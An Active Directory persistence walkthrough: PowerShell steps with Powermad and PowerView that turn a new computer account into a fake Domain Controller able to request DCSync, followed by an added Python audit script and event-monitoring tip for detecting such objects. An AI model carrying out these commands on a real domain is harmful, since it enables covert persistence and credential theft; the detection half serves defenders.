You create a computer object and then change an attribute to promote it to a Domain Controller. It will not have the powers of a real Domain Controller, but it can request DCSync, and the moment an IT admin gets suspicious and tries to delete it, ADUC will warn him that it is a Domain Controller:
Use the following tool:
https://github.com/Kevin-Robertson/Powermad
Import-Module .\Powermad.psm1
As Domain Admin, create a new computer account:
New-MachineAccount -MachineAccount <fakeDCName> -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Domain '<domain>' -DomainController '<domain-controller>'
Import the Active Directory module:
Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Move the newly created computer account into an unusual container such as LostAndFound:
Get-ADComputer -Identity <fakeDCName> | Move-ADObject -TargetPath 'CN=LostAndFound,DC=domain,DC=domain,DC=domain' -Verbose
Import the PowerView module:
. .\PowerView.ps1
Get the UserAccountControl attribute to verify the identity of a machine (DC → 8192 SERVER_TRUST_ACCOUNT or computer → 515 WORKSTATION_TRUST_ACCOUNT):
Get-DomainComputer <fakeDCName> | select name,useraccountcontrol,PrimaryGroupID
Change the attribute to make it a Domain Controller:
Set-DomainObject -Identity <fakeDCName> -Set @{ "useraccountcontrol" = 8192 } -Verbose
Now it is a Domain Controller:
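An added example (not part of the original write-up, Powermad or PowerView) of how a defender can spot such an object: it audits exported computer records for the DC markers used above (SERVER_TRUST_ACCOUNT, primaryGroupID 516, location) and cross-checks them against the machines that really have an NTDS Settings object (for instance the output of Get-ADDomainController). The record layout, the set of real DCs and the sample objects are constructed assumptions.

```python
"""Audit computer accounts that claim Domain Controller status but are not real DCs."""
from dataclasses import dataclass

# userAccountControl flag bits (MS-ADTS): a member machine carries 0x1000,
# a domain controller carries 0x2000 (decimal 8192).
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000
# primaryGroupID RIDs: 515 = Domain Computers, 516 = Domain Controllers.
RID_DOMAIN_COMPUTERS = 515
RID_DOMAIN_CONTROLLERS = 516


@dataclass
class Computer:          # one exported AD computer object (assumed layout)
    name: str            # sAMAccountName, e.g. "DC01$"
    dn: str              # distinguishedName
    uac: int             # userAccountControl
    primary_group_id: int


def audit_fake_dcs(computers, real_dcs):
    """Return (name, reason) findings. real_dcs is the set of sAMAccountNames
    backed by an NTDS Settings object, i.e. the DCs the directory really has."""
    findings = []
    for c in computers:
        dn_lower = c.dn.lower()
        claims_dc = bool(c.uac & SERVER_TRUST_ACCOUNT)
        in_dc_group = c.primary_group_id == RID_DOMAIN_CONTROLLERS
        if (claims_dc or in_dc_group) and c.name not in real_dcs:
            findings.append((c.name, "DC flag/group but no NTDS Settings object"))
        if claims_dc and "ou=domain controllers" not in dn_lower:
            findings.append((c.name, "SERVER_TRUST_ACCOUNT outside Domain Controllers OU"))
        if claims_dc != in_dc_group:
            findings.append((c.name, "userAccountControl and primaryGroupID disagree"))
        if "cn=lostandfound" in dn_lower:
            findings.append((c.name, "computer object parked in LostAndFound"))
    return findings


# Constructed sample: one real DC, one workstation, one planted "DC".
REAL_DCS = {"DC01$"}
SAMPLE = [
    Computer("DC01$", "CN=DC01,OU=Domain Controllers,DC=corp,DC=example", 0x82000, 516),
    Computer("WS01$", "CN=WS01,CN=Computers,DC=corp,DC=example", 0x1000, 515),
    Computer("FAKEDC$", "CN=FAKEDC,CN=LostAndFound,DC=corp,DC=example", 8192, 516),
]

if __name__ == "__main__":
    for name, reason in audit_fake_dcs(SAMPLE, REAL_DCS):
        print(f"{name}: {reason}")
```

The same checks map onto event monitoring: a 4742 (computer account changed) event that sets SERVER_TRUST_ACCOUNT on an object outside the Domain Controllers OU deserves an immediate look.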